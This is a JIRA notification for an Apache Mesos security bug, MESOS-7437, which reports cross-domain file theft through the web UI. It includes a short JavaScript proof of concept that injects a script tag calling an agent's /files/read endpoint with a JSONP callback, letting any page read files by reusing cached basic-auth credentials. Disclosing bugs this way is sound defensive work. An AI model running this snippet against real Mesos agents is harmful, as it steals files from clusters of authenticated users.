[ https://issues.apache.org/jira/browse/MESOS-7437?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Gavin updated MESOS-7437: ------------------------- Comment: was deleted (was: www.rtat.net) > cross domain file-theft in the web-ui > ------------------------------------- > > Key: MESOS-7437 > URL: https://issues.apache.org/jira/browse/MESOS-7437 > Project: Mesos > Issue Type: Bug > Components: security, webui > Reporter: Jacob Janco > Assignee: Jacob Janco > Priority: Major > > {code:javascript} > x=document.createElement('script') > x.src='http://$AGENT_URI/files/read?path=$PATH_TO_FILE&offset=0&length=50000&jsonp=console.log&_=1490306716903' > document.body.appendChild(x) > {code} > The above code pasted into the web console on http://example.com/, for > example, will yield the contents of the requested file. Basic auth is cached > and resent in browser tabs/windows as long as the user has authenticated > during the browser session. -- This message was sent by Atlassian JIRA (v7.6.3#76005)